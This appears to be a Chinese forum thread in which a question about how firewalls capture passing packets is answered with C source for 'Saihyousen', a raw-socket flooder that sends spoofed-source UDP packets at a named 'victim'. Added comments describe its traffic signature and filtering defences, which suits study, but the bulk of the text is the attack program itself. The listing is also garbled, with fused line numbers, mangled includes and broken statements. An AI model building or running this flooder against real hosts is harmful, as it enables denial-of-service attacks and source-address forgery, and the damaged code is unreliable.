请问高手,类似于防火墙之类的软件,如何获取经过主机的所有数据包,
应该不会用SNIFFER的原理.
---------------------------------------------------------------
防火墙的源代码不好找,不过下面是一个攻击防火墙的源代码,希望对你有所帮助。注意:这段代码只演示用原始套接字(raw socket)发送伪造源地址的UDP包,并没有演示如何截获经过主机的数据包;它的参考价值在于了解防火墙需要识别和过滤什么样的流量:
#include
1<sys types.h="">
2#include<sys socket.h="">
3#include<netinet in_systm.h="">
4#include<netinet in.h="">
5#include<netinet ip.h="">
6#include<netinet udp.h="">
7#include<errno.h>
8#include<strings.h>
9#include<netdb.h>
10#include <stdlib.h>
11#include<stdio.h>
12#ifdef BROKEN_LIBC
13#include <arpa inet.h="">
14#else
15#define u_char unsigned char
16#define u_short unsigned short
17#endif
18
/* File-scope address storage; main() points a struct sockaddr_in * at it and passes it to sendto(). */
19struct sockaddr sa;
20
/*
 * main - builds one fixed IPv4/UDP datagram template and sends it repeatedly
 * to the host named in argv[1] through a raw socket, rewriting the source
 * address and both UDP ports before every send.
 *
 * argv[1]  destination host name or address (resolved with gethostbyname)
 * argv[2]  packet count, parsed with atoi(); the loop bound is inclusive, so
 *          count+1 datagrams are sent
 *
 * Returns 1 after the loop completes; every error path calls exit(1).
 *
 * Traffic characteristics a defender can read directly off this listing:
 *   - IP identification field is the constant 0x1234, TTL is 0xFF,
 *     protocol is 0x11 (UDP), header checksum bytes are zero in the template
 *   - declared IP total length is 0x0026 (38) and UDP length is 0x0012 (18),
 *     while only 36 bytes are handed to sendto()
 *   - UDP source port always equals the destination port, and the value
 *     advances by one per packet
 *   - payload is the 8 ASCII bytes "31337890"
 *   - forged source address has the form a.b.c.a (first and last octet equal),
 *     with a, b and c each advancing by one per packet
 * Source-address validation at the network edge (ingress/egress filtering)
 * and per-destination UDP rate limiting are the usual controls against
 * traffic of this shape.
 *
 * NOTE(review): the listing is extraction-damaged (gutter numbers fused to
 * each line, wrapped string literals, mangled #include lines) and is kept
 * here exactly as it appears on the page.
 */
21int main(int argc,char **argv)
22{
23int fd;
/* Option value passed to setsockopt(IP_HDRINCL) below. */
24int x=1;
/* Seed octets for the forged source address; all three are advanced every loop pass. */
25int hosti=192;
26int hostii=168;
27int hostiii=1;
/* Small state counter used by the octet-advance cascade in the loop. */
28int meep=0;
/* Port counter; written into both the UDP source and destination port fields. */
29int fooport=1;
30int numpack=0;
/* Text form of the forged source address, filled by sprintf() in the loop. */
31char funhost[15];
32struct sockaddr_in *p;
33struct hostent *he;
/* 36-byte packet template: 20-byte IPv4 header, 8-byte UDP header, 8-byte payload. */
34u_char gram[36]=
35{
/* bytes 0-3: version/IHL 0x45, TOS 0, total length 0x0026 */
360x45, 0x00, 0x00, 0x26,
/* bytes 4-7: identification 0x1234, flags/fragment offset 0 */
370x12, 0x34, 0x00, 0x00,
/* bytes 8-11: TTL 0xFF, protocol 0x11 (UDP), header checksum left zero */
380xFF, 0x11, 0, 0,
/* bytes 12-15: source address, overwritten each loop pass */
390, 0, 0, 0,
/* bytes 16-19: destination address, overwritten each loop pass */
400, 0, 0, 0,
/* bytes 20-23: UDP source and destination port, overwritten each loop pass */
410, 0, 0, 0,
/* bytes 24-27: UDP length 0x0012, UDP checksum zero */
420x00, 0x12, 0x00, 0x00,
/* bytes 28-35: fixed ASCII payload */
43'3','1','3','3','7','8','9','0'
44};
45
/* Exactly two arguments are required; otherwise print the banner/usage text and exit. */
46if(argc!=3)
47{
48fprintf(stderr,"Saihyousen, by Noc-Wage\n");
49fprintf(stderr,"The faster your connection to the internet is (latency
50wise, not bandwidth)\n");
51fprintf(stderr,"and the lower the CPU speed of the victim
52will\nincrease probability of success\n");
53fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen
54127.0.0.1 40000\n",*argv);
55exit(1);
56};
/* Raw IP socket; opening one normally needs elevated privilege (root, or CAP_NET_RAW on Linux). */
57if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
58{
59perror("requires RAW SOCKETS");
60exit(1);
61};
62
/*
 * IP_HDRINCL tells the stack that the caller supplies the IP header, which is
 * what lets the program set its own source address. When the macro is not
 * defined at compile time the program only prints a message and carries on.
 */
63#ifdef IP_HDRINCL
64if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
65{
66perror("setsockopt IP_HDRINCL");
67exit(1);
68};
69#else
70fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
71#endif
72
/* Inclusive bound: runs atoi(argv[2])+1 times; atoi() is re-evaluated on every pass. */
73for (numpack=0;numpack<=atoi(argv[2]);numpack++) {
/*
 * These are plain ifs, not else-ifs, so meep goes 0 -> 1 -> 2 -> 0 within a
 * single pass and all three octets are incremented every time. Each octet
 * wraps to 1 once it exceeds 254.
 */
74if (meep==0) { ++hosti; meep++; }
75if (hosti>254) hosti=1;
76if (meep==1) { ++hostii; meep++;}
77if (hostii>254) hostii=1;
78if (meep==2) { ++hostiii; meep=0;}
79if (hostiii>254) hostiii=1;
80
/* Forged source is formatted as hosti.hostii.hostiii.hosti (first and last octet identical). */
81sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti);
/* The result of this lookup is dereferenced on the next line without a NULL check. */
82(he=gethostbyname(funhost));
/* Write the forged source address into IP header bytes 12-15. */
83bcopy(*(he->h_addr_list),(gram+12),4);
84
/* The destination is resolved again on every pass; failure ends the program. */
85if((he=gethostbyname(argv[1]))==NULL)
86{
87fprintf(stderr,"can't resolve destination hostname\n");
88exit(1);
89};
/* Write the destination address into IP header bytes 16-19. */
90bcopy(*(he->h_addr_list),(gram+16),4);
/* Port counter is incremented before use (first value sent is 2) and resets to 1 above 65530. */
91fooport++;
92if (fooport>65530) {fooport=1;};
/* Same value goes into the UDP source port (offset 20) and destination port (offset 22). */
93*(u_short*)(gram+20)=htons((u_short)fooport);
94*(u_short*)(gram+22)=htons((u_short)fooport);
95
/* Destination sockaddr for sendto(): family and address are set; sin_port is not assigned here. */
96p=(struct sockaddr_in*)&sa
97p->sin_family=AF_INET;
98bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
99
/* Sends the full 36-byte template; any sendto() failure ends the program. */
100if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct
101sockaddr)))== -1)
102{
103perror("sendto");
104exit(1);
105};
106};
107printf("Attack against %s finished", argv[1]);
108putchar('\n');
/* Exit status is 1 even when the loop ran to completion. */
109return 1;
110}</arpa></stdio.h></stdlib.h></netdb.h></strings.h></errno.h></netinet></netinet></netinet></netinet></sys></sys>